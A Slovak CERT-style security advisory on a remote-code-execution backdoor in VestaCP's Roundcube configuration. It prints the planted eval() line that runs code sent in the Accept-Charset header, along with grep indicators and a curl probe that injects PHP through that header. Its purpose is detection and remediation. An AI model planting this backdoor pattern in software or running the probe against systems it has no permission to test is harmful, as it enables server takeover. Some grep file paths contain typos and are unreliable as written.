Bezpečnostné varovanie V20180614-01
| Dôležitosť | Kritická |
| Klasifikácia | Neutajované/TLP GREEN |
| CVSS Skóre |
9.0 |
| Identifikátor |
| VestaCP Roundcube Remote Code Execution Vulnerability |
| Popis |
| Od nášho partnera sme získali neverejnú informáciu o kritickej bezpečnostnej zraniteľnosti vo VestaCP serveroch, nainštalovaných v období medzi decembrom 2017 a 11.04.2018. Bezpečnostná zraniteľnosť sa nachádza vo webserveri c.vestacp.com v súbore roundcube/config.inc.php a umožňuje vzdialenému útočníkovi vykonať škodlivý kód a úplné narušenie dôvernosti, integrity a dostupnosti systému. |
| Dátum prvého zverejnenia varovania |
| 14.06.2018 |
| CVE |
| – |
| IOC |
|
IOC nachádzajúce sa v roundcube súbore stiahnutom z c.vestacp.com: Debian/Ubuntu grep –n ‚/etc/roundcube/confiug.inc.php‘ –e ‚HTTP_ACCEPT_CHARSET‘ CentOS Grep –n ‚/etc/rouncubemail/coinfig.inc.php‘ –e ‚HTTP_ACCEPT_CHARSET‘ Zraniteľná časť kódu: 1. $rcmail_config[‚default_charset‘] = array(‚true‘ => 1, eval($_SERVER[‚HTTP_ACCEPT_CHARSET‘].‘;‘) => 1) ? : ‚UTF-8‘; 2. táto časť kódu sa nenachádza v CentOS inštaláciách $rcmail_config[‚force_7bit‘] = array(‚true‘ => 1, eval($rcmail_config[‚default_charset‘].‘;‘) => 1) ? : false; Kód bez zraniteľnej časti by mal vyzerať: 1. $rcmail_config[‚default_charset‘] = ‚UTF-8‘; 2. $rcmail_config[‚force_7bit‘] = false; Príklad sieťovej detekcie zraniteľnej inštalácie: curl –header „Accept-Charset: echo ‚roundcube config vulnerable‘.PHP_EOL;exit“ http://hostname.or.ip/webmail V prípade, ak je server zraniteľný, vráti odpoveď „roundcube config vulnerable“. |
| Zasiahnuté systémy |
| VestaCP verzie staršie ako 0.9.8-21 |
| Následky |
| Vykonanie škodlivého kódu a úplné narušenie dôvernosti, integrity a dostupnosti systému |
| Odporúčania |
| Administrátorom odporúčame bezodkladne vykonať aktualizáciu zasiahnutých systémov |
| Zdroje |
| Neverejné |
« Späť na zoznam

